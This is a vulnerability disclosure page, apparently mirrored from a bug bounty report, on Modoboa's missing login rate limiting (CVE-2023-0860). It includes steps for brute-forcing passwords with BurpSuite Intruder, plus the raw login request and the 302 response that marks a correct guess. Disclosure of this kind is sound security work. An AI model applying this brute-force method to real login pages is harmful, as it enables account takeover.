Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntr0xsu3ks64F3AB93-1357-4468-8FF4-52BBCEC18CCA
HistoryFeb 13, 2023 - 8:17 p.m.

No Protection Against Bruteforce Attacks on Login Page in

2023-02-1320:17:29
0xsu3ks
www.huntr.dev
28
modoboa
restrict
unsuccessful attempts
brute force
burpsuite
intruder
payload
reason code
unauthorized
replay
password list

EPSS

0.001

Percentile

38.5%

JSON

Description

Modoboa does not restrict or limit unsuccessful login attempts allowing an attacker to brute force the password of a known user

Proof of Concept

Steps to Reproduce:

Capture login request with BurpSuite
Send to Intruder
Replay the login request with a different password value utilizing a password list payload
Should the password exist a “302 Found” reason code will be issued
Unsuccessfull attempts are returned with a “401 Unauthorized” reason
BurpSuite will continute attempting all passwords in the password list until complete
Request to be replayed:

POST /accounts/login/ HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 123
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/accounts/login/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: lhc_vid=6329efff387471209bb0; fsNick=admin; fsLogkey=NitRWJcUvIn12gjh8kVKazD07MsuqHmxeXAT45fCyLpGbPElZBrOw3dSFYQo96; fsLang=en_EN; fsCompany=1; csrftoken=RlWHrJOqodNZ9lTk6N6WUMhBTQ2LVNhZVDSEs3tOHSx4eI3bbXnNQ2Wfz6IkargL
Connection: close

Response on successful guess:

HTTP/1.1 302 Found
Date: Thu, 19 Jan 2023 21:27:50 GMT
Server: WSGIServer/0.2 CPython/3.9.16
Content-Type: text/html; charset=utf-8
Location: /dashboard/
Expires: Thu, 19 Jan 2023 21:27:50 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
X-Frame-Options: SAMEORIGIN
Vary: Accept-Language, Cookie
Content-Language: en
Content-Length: 0
Set-Cookie:  csrftoken=JGu3cD6SKchdVSkBFRUiofpt0h8Z6P5OLf3DRmWzKHNkaVhLUDNKFlcTg2uACDs4; expires=Thu, 18 Jan 2024 21:27:50 GMT; Max-Age=31449600; Path=/; SameSite=Lax
Set-Cookie:  sessionid=0mah6hyvojbt7cbjh06sksu61sj4tnay; HttpOnly; Path=/; SameSite=Lax

Related

prion 1
cve 1
osv 2
cvelist 1
nvd 1
github 1
prion
prion
Input validation
2023-02-16 10:15:00
cve
cve
CVE-2023-0860
2023-02-16 10:15:11
osv
osv
Improper Restriction of Excessive Authentication Attempts in modoboa
2023-02-16 12:30:22
CVE-2023-0860
2023-02-16 10:15:11
cvelist
cvelist
CVE-2023-0860 Improper Restriction of Excessive Authentication Attempts in modoboa/modoboa-installer
2023-02-16 00:00:00
nvd
nvd
CVE-2023-0860
2023-02-16 10:15:11
github
github
Improper Restriction of Excessive Authentication Attempts in modoboa
2023-02-16 12:30:22

EPSS

0.001

Percentile

38.5%

JSON
Related for 64F3AB93-1357-4468-8FF4-52BBCEC18CCA
prion1cve1osv2cvelist1nvd1github1